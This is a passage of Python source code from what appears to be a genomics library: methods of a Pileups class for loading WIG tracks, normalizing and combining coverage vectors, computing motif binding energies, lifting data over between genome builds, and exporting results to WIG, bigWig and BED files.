chrom = toolbox.convert_chroms(field_split[1], dest=self.chromosome_dialect)
if len(split_line) == 3:
field_split = split_line[2].split('=')
if field_split[0] != 'span':
raise Exception('Missing field "span" on line {}'.format(line_num))
else:
span = int(field_split[1])
else:
span = 1
if chrom in self.pileups: # only process if we have this chromosome
region_type = 'variable'
else:
missing_chroms.add(chrom)
region_type = None
# data lines
elif region_type == 'fixed':
if len(split_line) != 1:
# print 'split_line:{}'.format(split_line)
raise Exception(
'Invalid number of elements for fixedStep data on line {}. Expected {}, found {}. Line: {}'.format(
line_num, 1, len(split_line), line.strip()))
data_val = float(split_line[0])
start_pos = region_start + offset * step
end_pos = start_pos + span
self.pileups[chrom][start_pos:end_pos] = data_val
populated_count += end_pos - start_pos
offset += 1
elif region_type == 'variable':
if len(split_line) != 2:
raise Exception(
'Invalid number of elements for variableStep data on line {}. Expected {}, found {}. Line: {}'.format(
line_num, 2, len(split_line), line.strip()))
start_pos = int(split_line[0])
end_pos = start_pos + span
data_val = float(split_line[1])
self.pileups[chrom][start_pos:end_pos] = data_val
populated_count += end_pos - start_pos
self.toType(pileup_dtype)
print('Done in {}'.format(datetime.datetime.now() - start_time))
print('{} data values added, {} of genome (assuming no overlaps)'.format(populated_count,
populated_count / float(
self.genome_size)))
if missing_chroms:
            print('The following chromosomes in the WIG file were not present in this pileup object: {}'.format(
', '.join(sorted(list(missing_chroms)))))
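    # Illustrative usage sketch (file name and chrom_lengths dictionary are assumptions): populating
    # a pileup from a WIG track; both fixedStep and variableStep declaration lines are handled:
    #   signal = Pileups(chrom_lengths=chrom_lengths, name='conservation', build='hg38')
    #   signal.loadFromWig('conservation_scores.wig', pileup_dtype=numpy.float32)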
def populateFromProbes(self, probe_dict, interpolate=False, chromosome_endpoint_value=0):
"""
Given a dictionary (keyed by chromosome name) that contains sequences of tuples in the form (position, value),
such as might be obtained from a tiled microarray experiment, populate self with a continuous vector of values.
If interpolate is True, positions between probes will be interpolated as a linear transition between probes.
Otherwise, the between-probe positions will take on the value of the nearest probe.
        :param probe_dict: dictionary keyed by chromosome name, each value a sequence of (position, value) tuples
:return:
"""
print('Populating from microarray probes. Interpolation: {}'.format(('OFF', 'ON')[bool(interpolate)]))
self._initialize()
for chrom in probe_dict:
print('\tPopulating chromosome {}'.format(chrom))
            last_pos = 0
            last_value = chromosome_endpoint_value
for probe_pos, probe_value in list(probe_dict[chrom]) + [(self.chrom_lengths[chrom],
chromosome_endpoint_value)]: # add a dummy probe for the end of the chromosome
if probe_pos > self.chrom_lengths[chrom]:
print((probe_pos, self.chrom_lengths[chrom]))
assert probe_pos <= self.chrom_lengths[chrom]
distance = probe_pos - last_pos
if interpolate:
difference = probe_value - last_value
# print 'Last_pos: {}, last_value: {}, probe_pos: {}, probe_value: {}, distance: {}, difference: {}'.format(last_pos, last_value, probe_pos, probe_value, distance, difference)
for offset in range(distance):
self.pileups[chrom][last_pos + offset] = last_value + difference * (offset / float(distance))
# print '\t{} {}'.format(offset, self.pileups[chrom][last_pos + offset])
else:
midpoint = last_pos + int((probe_pos - last_pos) / 2)
# print last_pos, probe_pos, midpoint
self.pileups[chrom][last_pos:midpoint] = last_value
self.pileups[chrom][midpoint:probe_pos] = probe_value
last_pos = probe_pos
last_value = probe_value
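    # Illustrative usage sketch (probe coordinates and values are made up): filling a pileup from
    # sparse tiling-array probes, with linear interpolation between adjacent probes:
    #   probes = {'1': [(100, 0.5), (400, 1.2), (900, 0.1)]}
    #   array_signal = Pileups(chrom_lengths={'1': 1000}, name='tiling_array', build='hg38')
    #   array_signal.populateFromProbes(probes, interpolate=True)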
def computeCoverage(self):
self.coverage = self.total_read_length / float(self.genome_size)
def computeNucleotideFrequencies(self):
"""
Assumes self contains genomic sequences. Computes the frequency of each nucleotide in the genome and returns
as a dictionary
:return:
"""
return motifs.compute_background_distribution(numpy.concatenate(list(self.pileups.values())), normalize=True)
def normalize(self, new_coverage=1):
"""
        Converts raw pileup counts to normalized values with a mean genome-wide coverage of <new_coverage>
"""
print('Normalizing {}'.format(self.name))
if not self.is_normalized:
start_time = datetime.datetime.now()
            print('Coverage currently {}. Normalizing to mean coverage of {}...'.format(self.coverage, new_coverage))
for chrom in self.pileups:
# new_pileup = numpy.zeros(self.chrom_lengths[chrom], dtype = float)
# new_pileup = self.pileups[chrom] / float(self.coverage)
self.pileups[chrom] *= (new_coverage / float(self.coverage))
# self.pileups[chrom] = new_pileup
self.is_normalized = True
print('Done in {}.'.format(datetime.datetime.now() - start_time))
else:
print('\tAlready normalized. Nothing to do.')
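    # Illustrative usage sketch: after loading reads (which sets self.coverage), samples are
    # typically brought to a common mean genome-wide coverage before comparison:
    #   reads.normalize(new_coverage=1)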
def mean(self, list_of_pileups):
"""
Populates itself with the mean of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
print('Calculating the mean of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.mean([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
# the mean is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
def var(self, list_of_pileups):
"""
Populates itself with the variance of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
print('Calculating the variance of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.var([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
# the variance is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
def std(self, list_of_pileups):
"""
        Populates itself with the standard deviation of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
        print('Calculating the standard deviation of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.std([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
# the SD is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
def product(self, list_of_pileups):
"""
Populates itself with the product of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
print('Calculating the product of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.product([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
        # the product is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
# def sum(self, list_of_pileups):
# """
# Populates itself with the sum of all the Pileup objects in <list_of_pileups>
# """
# start_time = datetime.datetime.now()
# print('Calculating the sum of {} pileups'.format(len(list_of_pileups)))
# self._initialize()
# for pileup in list_of_pileups:
# for chrom in self.chrom_lengths:
# assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
# for chrom in self.chrom_lengths:
# if numpy.product([chrom in pileup.pileups for pileup in
# list_of_pileups]): # only process chromosomes present in all datasets
# self.pileups[chrom] = numpy.sum([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
# dtype=float)
#the SD is normalized if all the input datasets are normalized
# self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
# print('Done in {}.'.format(datetime.datetime.now() - start_time))
def sum(self):
"""
Returns the scalar sum of the contents of all contigs.
"""
return self.flatten().astype(float).sum()
def flatten(self, chrom_list=[], include_sex=True):
"""
Return a flat pileup vector by concatenating the individual chromosome vectors (in lexicographical order by chromosome name)
"""
# start_time = datetime.datetime.now()
if not chrom_list:
chrom_list = list(self.pileups.keys())
if not include_sex:
chrom_list = [chrom for chrom in chrom_list if
not sum([element in chrom for element in ['X', 'Y', 'Z', 'W']])]
# print 'Flattening...'
flat_pileup = numpy.concatenate([self.pileups[chrom] for chrom in toolbox.numerical_string_sort(chrom_list)])
# print 'Done in {}.'.format(datetime.datetime.now() - start_time)
return flat_pileup
def clip(self, min_value=0, max_value=1):
"""
        Constrains the pileup vectors to be between :param:`min_value` and :param:`max_value`
by applying the numpy.clip function.
"""
print('Clipping pileup values to be between {} and {}'.format(min_value, max_value))
for chrom in self.pileups:
            self.pileups[chrom] = numpy.clip(self.pileups[chrom], a_min=min_value, a_max=max_value)
def smooth(self, gaussian_kernel_bandwidth=45):
"""
Smooth chromosome vectors with a gaussian kernel of width <gaussian_kernel_bandwidth>
:param gaussian_kernel_bandwidth:
:return:
"""
new_pileups = self.emptyCopy()
for chrom in self.pileups:
new_pileups.pileups[chrom] = scipy.ndimage.gaussian_filter1d(self.pileups[chrom].astype(numpy.float64),
sigma=gaussian_kernel_bandwidth)
return new_pileups
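    # Illustrative usage sketch: unlike StrandedPileups.smooth(), this method returns a new object,
    # so a 45 bp Gaussian smoothing pass would be written as:
    #   smoothed = reads.smooth(gaussian_kernel_bandwidth=45)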
def applyKernel(self, kernel):
new_pileups = self.emptyCopy()
for chrom in self.pileups:
new_pileups.pileups[chrom] = toolbox.apply_kernel(self.pileups[chrom].astype(numpy.float64), kernel).astype(
self.pileup_dtype)
return new_pileups
def computeBindingEnergy(self, motif, pileup_dtype=PILEUP_DTYPE):
"""
Assumes that we contain a sequence.
Given a log-odds PWM, compute binding energies for both the sequence and its reverse complement,
then return them as a StrandedPileup
:param motif:
:return:
"""
start_time = datetime.datetime.now()
print(('Generating binding energies for {}'.format(self.name)))
binding_energies = StrandedPileups(name=self.name + '_binding_energy', build=self.build,
chrom_lengths=self.chrom_lengths)
binding_energies.spileups = {}
# chrom, sequence_vector, motif = params
param_list = [(chrom, self.pileups[chrom][:], motif) for chrom in
sorted(list(self.pileups.keys()), key=lambda x: self.chrom_lengths[x], reverse=True)]
if MULTI_PROCESSING_METHOD == 'hybrid' or MULTI_PROCESSING_METHOD == 'antfarm':
# convert parameter list to job dictionary to feed to AntFarm consisting only of chromosomes too large
# to use in Pool
job_dict = collections.OrderedDict()
new_param_list = []
for paramset in param_list:
if MULTI_PROCESSING_METHOD == 'antfarm' or len(paramset[1]) > MAX_MESSAGE_SIZE:
job_dict[paramset[0]] = {'inputs': [paramset[1], paramset[2]], 'num_outputs': 2,
'params': [paramset[0]]}
else:
new_param_list.append(paramset)
param_list = new_param_list
print((
'Spawning up to {} subprocesses (using AntFarm) to compute binding energies for {} chromosomes...'.format(
THREADS, len(
job_dict))))
binding_energy_farm = antfarm.AntFarm(slave_script=toolbox.home_path(
'workspace/expression_modeling/model/pileup_binding_energy_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = binding_energy_farm.execute()
del job_dict
for chrom in results:
binding_energies.spileups[chrom] = {-1: results[chrom][0].astype(self.pileup_dtype),
1: results[chrom][1].astype(self.pileup_dtype)}
if MULTI_PROCESSING_METHOD == 'pool' or MULTI_PROCESSING_METHOD == 'hybrid':
print((
'Spawning up to {} subprocesses (using multiprocessing.Pool) to compute binding energies for {} chromosomes...'.format(
THREADS, len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(binding_energy_chromslave, param_list)
elif MULTI_PROCESSING_METHOD == 'none':
            print(('Computing binding energies for {} chromosomes with a single process...'.format(len(self.pileups))))
results = list(map(binding_energy_chromslave, param_list))
if MULTI_PROCESSING_METHOD in ('pool', 'hybrid', 'none'):
for chrom, extended_fragments in results:
binding_energies.spileups[chrom] = {-1: extended_fragments[0], 1: extended_fragments[1]}
print(('Done computing binding energies in {}'.format(datetime.datetime.now() - start_time)))
# binding_energies.toType(pileup_dtype)
return binding_energies
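    # Illustrative usage sketch (the FASTA path and motif object are assumptions): given a genome
    # sequence loaded with loadFromFasta() and a log-odds PWM from the motifs module, stranded
    # binding energies and binding probabilities could be computed as:
    #   genome = Pileups(chrom_lengths=chrom_lengths, name='genome', build='hg38')
    #   genome.loadFromFasta('genome.fa')
    #   energies = genome.computeBindingEnergy(my_motif)
    #   probabilities = energies.bindingEnergyToProbability(mu=-6.0)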
def liftover(self, build_mapper, source_pileup):
"""
Populate itself by lifting over all the pileup values from <source_pileup> to self using
<build_mapper>. The .build attributes must be set in both this object and <source_pileup>.
Loci that cannot be lifted over will be left as NaN
"""
start_time = datetime.datetime.now()
print(('Lifting over {} from {} to {}...'.format(source_pileup.name, source_pileup.build, self.build)))
self._initialize(None)
        multiple_dest_count = 0
lifted_over_count = 0
no_chromosome_counts = {}
no_match_count = 0
for chrom in source_pileup.chrom_lengths:
for source_pos in range(source_pileup.chrom_lengths[chrom]):
candidate_dest_loci = build_mapper.liftover_locus(source_build=source_pileup.build,
dest_build=self.build, source_locus=(
toolbox.convert_chroms(chrom, dest=self.chromosome_dialect),
source_pos))
if candidate_dest_loci:
                    # if the source maps to more than one destination, take note of it and don't lift over
                    if len(candidate_dest_loci) > 1:
                        multiple_dest_count += 1
else:
dest_locus = (toolbox.convert_chroms(candidate_dest_loci[0][0], dest=self.chromosome_dialect),
candidate_dest_loci[0][1])
if dest_locus[0] in self.chrom_lengths: # only liftover chromosomes existing in the destination
try:
self.pileups[dest_locus[0]][dest_locus[1]] = source_pileup.pileups[chrom][source_pos]
except IndexError as ie:
print(('Destination position invalid. Source locus: {}, destination locus: {}'.format(
(chrom, source_pos), dest_locus)))
else:
lifted_over_count += 1
else:
if chrom not in no_chromosome_counts:
no_chromosome_counts[chrom] = 0
no_chromosome_counts[chrom] += 1
else:
no_match_count += 1
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
print(('{} total loci lifted over, {} did not (out of {} in the source and {} in the destination).'.format(
lifted_over_count, no_match_count, source_pileup.genome_size, self.genome_size)))
        print(
            ('{} source loci mapped to multiple destinations (and were not lifted over).'.format(multiple_dest_count)))
print(('{} source loci mapped to a chromosome that is not present in the destination. Specifically:'.format(
sum(no_chromosome_counts.values()))))
print(('{}'.format(', '.join(['{}: {}'.format(k, no_chromosome_counts[k]) for k in no_chromosome_counts]))))
def liftoverWithMappingTable(self, destination_build, destination_chrom_lengths, mapping_table_filename,
pileup_dtype=None):
"""
Use <mapping_table_filename> to liftover the pileup vectors in <self>
and return it as a new pileup object.
:return:
"""
CHROM_FIELD = 0
DESTINATION_FRAG_START = 4
DESTINATION_INSERTION = 5
DESTINATION_FRAG_END = 6
SOURCE_FRAG_START = 8
SOURCE_INSERTION = 9
SOURCE_FRAG_END = 10
if not pileup_dtype:
pileup_dtype = self.pileup_dtype
with open(mapping_table_filename, 'rt') as mapping_table:
print(('Lifting over reads to {} using {}...'.format(destination_build, mapping_table_filename)))
lifted_pileups = Pileups(chrom_lengths=destination_chrom_lengths, name=self.name, build=destination_build,
chromosome_dialect=self.chromosome_dialect, pileup_dtype=pileup_dtype)
lifted_pileups._initialize()
# print lifted_pileups.pileups
table_reader = csv.reader(mapping_table, dialect=csv.excel_tab)
for line_num, line in enumerate(table_reader):
# remember mapping table is 1-based
if line_num % 100000 == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if line[SOURCE_FRAG_START] != line[SOURCE_FRAG_END]:
# print line
chrom = toolbox.convert_chroms(line[CHROM_FIELD], dest=self.chromosome_dialect)
if chrom not in self.pileups:
warning_message = 'Found chromosome {} in mapping table but no record of it in {}.'.format(
chrom,
self.build)
print(('Warning: {}'.format(warning_message)))
break
# raise Exception(warning_message)
if chrom not in lifted_pileups.pileups:
warning_message = 'Found chromosome {} in mapping table but no record of it in {}.'.format(
chrom,
destination_build)
print(('Warning: {}'.format(warning_message)))
break
# raise Exception(warning_message)
dest_frag_start = int(line[DESTINATION_FRAG_START]) - 1
dest_frag_end = int(line[DESTINATION_FRAG_END]) + 1
source_frag_start = int(line[SOURCE_FRAG_START]) - 1
source_frag_end = int(line[SOURCE_FRAG_END]) + 1
if line[DESTINATION_INSERTION] == r'\N' and line[SOURCE_INSERTION] == r'\N':
if source_frag_end - source_frag_start != dest_frag_end - dest_frag_start:
raise Exception(
'Source ({} bp) and destination ({} bp) fragments not the same size on line {}'.format(
source_frag_end - source_frag_start, dest_frag_end - dest_frag_start, line_num))
else:
try:
lifted_pileups.pileups[chrom][dest_frag_start:dest_frag_end] = self.pileups[chrom][
source_frag_start:source_frag_end]
except ValueError as ve:
                            print(('ValueError on line {}. Source: {} {} {}, destination: {} {} {}'.format(
line_num, source_frag_start, source_frag_end, source_frag_end - source_frag_start,
dest_frag_start, dest_frag_end, dest_frag_end - dest_frag_start)))
print(('chrom: {}'.format(chrom)))
print(('source chromosome size: {}'.format(self.pileups[chrom].shape)))
print(('destination chromosome size: {}'.format(lifted_pileups.pileups[chrom].shape)))
print(line)
raise ve
return lifted_pileups
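    # Illustrative usage sketch (build names, chromosome lengths and table path are placeholders):
    # lifting a pileup from one assembly to another with a pre-computed fragment mapping table:
    #   lifted = reads.liftoverWithMappingTable('hg38', hg38_chrom_lengths,
    #                                           'hg19_to_hg38_mapping_table.txt')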
def liftoverWithChain(self, source_pileups, interval_basepath=INTERVAL_BASEPATH,
chainfile_basepath=CHAINFILE_BASEPATH, score_threshold=None,
query_size_threshold=None, ref_size_threshold=None):
overall_start_time = datetime.datetime.now()
# get intervals
best_intervals = filterchains.get_liftover_intervals(dest_build=self.build,
dest_chrom_lengths=self.chrom_lengths,
source_build=source_pileups.build,
source_chrom_lengths=source_pileups.chrom_lengths,
chainfile_basepath=chainfile_basepath,
interval_basepath=interval_basepath,
score_threshold=score_threshold,
query_size_threshold=query_size_threshold,
ref_size_threshold=ref_size_threshold,
source_chromosome_dialect=source_pileups.chromosome_dialect,
dest_chromosome_dialect=self.chromosome_dialect)
# apply intervals
print('Applying mapping intervals...')
self._initialize()
for query_chrom in best_intervals:
if len(best_intervals[query_chrom]) > 0:
if query_chrom in source_pileups.pileups:
print(('\tLifting over chromsome {} (in source) with {} intervals'.format(query_chrom, len(
best_intervals[query_chrom]))))
start_time = datetime.datetime.now()
for interval_idx, interval in enumerate(best_intervals[query_chrom]):
# if interval_idx % REPORTING_INTERVAL == 0:
# _print(
# 'Processing interval {} of {}'.format(interval_idx + 1,
# len(best_intervals[query_chrom])), 3)
query_start, query_end, ref_chrom, ref_offset, interval_polarity = interval
# slicing backwards requires subtracting 1 from both indices to get the same positions as a forward slice
ref_start = query_start + ref_offset
ref_end = query_end + ref_offset
# assert ref_start > 0
# assert ref_end < len(self.pileups[ref_chrom])
if interval_polarity == -1:
query_start -= 1
query_end -= 1
query_start, query_end = query_end, query_start # flip around
if ref_chrom in self.pileups:
try:
self.pileups[ref_chrom][ref_start:ref_end] = \
source_pileups.pileups[query_chrom][query_start:(query_end, None)[
query_end == -1]:interval_polarity] # make sure we include the 0th element in the reverse slice
except ValueError as ve:
print(('Interval: {}'.format(interval)))
print(('Interval polarity: {}'.format(interval_polarity)))
print(('Query interval: {} {}, {}, size: {}'.format(query_chrom, query_start, query_end,
query_end - query_start)))
print(('Reference offset: {}'.format(ref_offset)))
print(('Reference interval: {} {}, {}, size: {}'.format(ref_chrom, ref_start, ref_end,
ref_end - ref_start)))
raise ve
print(
('\t\tDone with chromosome {} in {}'.format(query_chrom, datetime.datetime.now() - start_time)))
else:
print(('\tQuery chromosome {} not in source'.format(query_chrom)))
else:
print(('\tQuery chromosome {} has no mapped intervals, skipping'.format(query_chrom)))
print(('Done lifting over data from {} to {} in {}.'.format(source_pileups.build, self.build,
datetime.datetime.now() - overall_start_time)))
def liftoverWithChain_old(self, source_pileups, chain_basepath, destination_dtype=None):
"""
Uses <chain_file> to liftover the contents of <source_pileups> to itself.
Chain files are named <Reference>To<Query>
"""
start_time = datetime.datetime.now()
if not destination_dtype:
destination_dtype = self.pileup_dtype
header_fields = (
'dummy', 'score', 'tName', 'tSize', 'tStrand', 'tStart', 'tEnd', 'qName', 'qSize', 'qStrand', 'qStart',
'qEnd',
'id')
# generate chain filename
chain_filename = os.path.join(chain_basepath,
'{}To{}.over.chain'.format(toolbox.first_lower(source_pileups.build),
toolbox.first_upper(self.build)))
missing_chroms = set([])
print(('Lifting over from {} using chain file {}'.format(source_pileups.name, chain_filename)))
with open(chain_filename, 'rt') as chain_file:
self._initialize(pileup_dtype=destination_dtype)
new_chain = True
good_chain = False
for line_num, line in enumerate(chain_file):
# new chain
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Processing line {}'.format(line_num), 1)
if new_chain and line != '\n': # insurance against multiple blank lines
header = toolbox.parse_line_dict(line, header_fields, split_char=' ', strict=True)
assert header['dummy'] == 'chain'
new_chain = False
# relative offsets within the chain
ref_chain_pos = 0
query_chain_pos = 0
ref_chrom = toolbox.convert_chroms(header['tName'], dest=source_pileups.chromosome_dialect)
query_chrom = toolbox.convert_chroms(header['qName'], dest=self.chromosome_dialect)
good_chain = False
if query_chrom in self.pileups:
try:
assert int(header['qSize']) == len(self.pileups[query_chrom])
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for query chromosome {} does not match our size of {}'.format(
line_num, header['id'], header['qSize'], query_chrom, len(self.pileups[query_chrom]))))
raise ae
if ref_chrom in source_pileups.pileups:
try:
assert int(header['tSize']) == len(source_pileups.pileups[ref_chrom])
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for reference chromosome {} does not match source size of {}'.format(
line_num, header['id'], header['tSize'], ref_chrom,
len(source_pileups.pileups[ref_chrom]))))
raise ae
good_chain = True
else:
missing_chroms.add(query_chrom)
ref_chain_start = int(header['tStart'])
query_chain_start = int(header['qStart'])
elif line == '\n':
# start a new chain on the next line
new_chain = True
elif good_chain:
# it must be a data line
split_line = line.split('\t')
size = int(split_line[0])
if len(split_line) == 3:
ref_diff = int(split_line[1])
query_diff = int(split_line[2])
elif len(split_line) == 1:
ref_diff = 0
query_diff = 0
else:
raise Exception(
'Encountered a chain alignment data line of length 2 on line {}. Unsure how to handle this.'.format(
line_num))
ref_start_pos = ref_chain_start + ref_chain_pos
ref_end_pos = ref_start_pos + size
ref_chain_pos += size + ref_diff
query_start_pos = query_chain_start + query_chain_pos
query_end_pos = query_start_pos + size
query_chain_pos += size + query_diff
# print line_num, ref_chrom, ref_start_pos, ref_end_pos, query_chrom, query_start_pos, query_end_pos, ref_chain_pos, query_chain_pos
self.pileups[query_chrom][query_start_pos:query_end_pos] = source_pileups.pileups[ref_chrom][
ref_start_pos:ref_end_pos]
# self.pileups[query_chrom][query_start_pos:query_end_pos] += 1
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
if missing_chroms:
print(('The following chromosomes in the chain file were missing in the destination organism: {}'.format(
','.join(sorted(list(missing_chroms))))))
def exportToWig(self, output_filename, name='', description='', destination_chromosome_dialect='ucsc',
wig_type='fixedStep', convert_to_bigwig=False):
"""
Exports the contents of the pileup in WIG format (see http://genome.ucsc.edu/goldenpath/help/wiggle.html for specification)
using "fixedStep" intervals
"""
start_time = datetime.datetime.now()
write_count = 0
total_length = sum(self.chrom_lengths.values())
WIGTOBIGWIG_PATH = 'wigToBigWig'
if wig_type not in ('fixedStep', 'variableStep'):
raise ValueError('Invalid parameter value for parameter <wig_type>. Got {}'.format(wig_type))
if not name:
name = self.name
output_path, output_prefix, output_extension = toolbox.parse_path(output_filename)
wig_filename = os.path.join(output_path, output_prefix + '.wig')
print(('Exporting contents of {} to {} in WIG format...'.format(name, wig_filename)))
        with open(wig_filename, 'w') as wig_file:
# write header
wig_file.write(
'track type=wiggle_0 name={} description={}\n'.format(
self.name.replace(' ', '_'), description.replace(' ', '_')))
# write track data
for chrom in toolbox.numerical_string_sort(list(self.pileups.keys())):
chromOut = toolbox.convert_chroms(chrom, dest=destination_chromosome_dialect)
dbg_print('Scanning chromosome {} to find first and last non-zero values ...'.format(chrom))
nz = numpy.nonzero(self.pileups[chrom])[0]
if len(nz) > 0:
start_pos = nz[0]
end_pos = nz[-1]
print(('\tNon-zero region: {}-{}'.format(start_pos, end_pos)))
if wig_type == 'fixedStep':
wig_file.write('fixedStep chrom={} start={} step=1\n'.format(
chromOut, start_pos))
                        for pos in range(start_pos, end_pos + 1):  # include the last non-zero position
if write_count % 1e7 == 0:
print(('\twriting line {:>10}, {:>3.0f} % done'.format(write_count,
write_count * 100 / float(
total_length))))
write_count += 1
wig_file.write('{}\n'.format(self.pileups[chrom][pos]))
elif wig_type == 'variableStep':
wig_file.write('variableStep chrom={}\n'.format(
chromOut))
                        for pos in range(start_pos, end_pos + 1):  # include the last non-zero position
if write_count % 1e7 == 0:
print(('\twriting line {:>10}. {:>3.0f} % done'.format(write_count,
write_count * 100 / float(
total_length))))
write_count += 1
wig_file.write('{} {}\n'.format(pos, self.pileups[chrom][pos]))
else:
print(('\tNo non-zero entries found for chromosome {} of length {}'.format(chrom,
self.chrom_lengths[
chrom])))
file_size = wig_file.tell()
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
print(('Resulting file has {} lines, total size: {:.2} MB'.format(write_count, file_size / float(2 ** 20))))
if convert_to_bigwig:
start_time = datetime.datetime.now()
bigwig_filename = os.path.join(output_path, output_prefix + '.bw')
print(('Converting to bigwig format as {}'.format(bigwig_filename)))
temp_chromosome_size_filename = os.path.join(output_path, '{}_chrom_sizes.txt'.format(self.build))
with open(temp_chromosome_size_filename, 'w') as chrom_size_file:
for chrom in self.chrom_lengths:
chrom_size_file.write('{}\t{}\n'.format(
toolbox.convert_chroms(chrom, dest=destination_chromosome_dialect),
self.chrom_lengths[chrom]))
cmd_line = [WIGTOBIGWIG_PATH, wig_filename, temp_chromosome_size_filename, bigwig_filename]
try:
conversion_output = subprocess.check_output(cmd_line)
except subprocess.CalledProcessError as cpe:
                print(('Error: return code {}, output: {}'.format(cpe.returncode, cpe.output)))
            except Exception as ex:
                print((ex.args, str(ex)))
else:
print(conversion_output)
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
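    # Illustrative usage sketch (output path is a placeholder): writing the pileup as a fixedStep
    # WIG track and converting it to bigWig (requires the wigToBigWig binary on the PATH):
    #   reads.exportToWig('my_sample.wig', description='normalized coverage',
    #                     wig_type='fixedStep', convert_to_bigwig=True)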
def exportToBed(self, bed_filename, region_prefix='region',
destination_chromosome_dialect='ucsc'):
"""
Exports the contents of the pileup in BED format
(see http://genome.ucsc.edu/FAQ/FAQformat.html#format1 for specification)
"""
start_time = datetime.datetime.now()
write_count = 0
print(('Exporting contents of {} to {} in BED format...'.format(self.name, bed_filename)))
with open(bed_filename, 'w') as bed_file:
bed_writer = csv.writer(bed_file, dialect=csv.excel_tab)
# write track data
for chrom in toolbox.numerical_string_sort(list(self.pileups.keys())):
previous_value = 0
region_start = 0
for pos in range(self.chrom_lengths[chrom]):
# if the value changed or we hit the end, then
if self.pileups[chrom][pos] != previous_value or pos == self.chrom_lengths[chrom] - 1:
if previous_value > 0: # we're ending a region, write it out
if write_count % 1e6 == 0:
dbg_print('Writing line {}'.format(write_count), 1)
write_count += 1
# WIG indexing is one-based
chromOut = toolbox.convert_chroms(chrom, dest=destination_chromosome_dialect)
chromStart = region_start
chromEnd = pos + 1
name = '{}_{}'.format(region_prefix, write_count)
score = previous_value
bed_writer.writerow([chromOut, chromStart, chromEnd, name, score])
if self.pileups[chrom][pos] > 0: # we're starting a new region
region_start = pos
previous_value = self.pileups[chrom][pos]
file_size = bed_file.tell()
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
print(('Resulting file has size: {:.2} MB'.format(file_size / float(2 ** 20))))
def mappabilityFromChain(self, other_build, other_chrom_lengths, from_or_to='from',
other_chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, chainfile_basepath=CHAINFILE_BASEPATH,
interval_basepath=INTERVAL_BASEPATH, score_threshold=None,
query_size_threshold=None, ref_size_threshold=None):
overall_start_time = datetime.datetime.now()
from_or_to = from_or_to.lower()
assert from_or_to in ('from', 'to')
print(('Populating with vector of mappability {} {}'.format(from_or_to, other_build)))
if from_or_to == 'to':
ref_build = other_build
query_build = self.build
ref_chrom_lengths = other_chrom_lengths
query_chrom_lengths = self.chrom_lengths
ref_chrom_dialect = other_chromosome_dialect
query_chrom_dialect = self.chromosome_dialect
else:
ref_build = self.build
query_build = other_build
ref_chrom_lengths = self.chrom_lengths
query_chrom_lengths = other_chrom_lengths
ref_chrom_dialect = self.chromosome_dialect
query_chrom_dialect = other_chromosome_dialect
# get intervals
best_intervals = filterchains.get_liftover_intervals(dest_build=ref_build,
dest_chrom_lengths=ref_chrom_lengths,
source_build=query_build,
source_chrom_lengths=query_chrom_lengths,
chainfile_basepath=chainfile_basepath,
interval_basepath=interval_basepath,
score_threshold=score_threshold,
query_size_threshold=query_size_threshold,
ref_size_threshold=ref_size_threshold,
source_chromosome_dialect=query_chrom_dialect,
dest_chromosome_dialect=ref_chrom_dialect)
# apply intervals
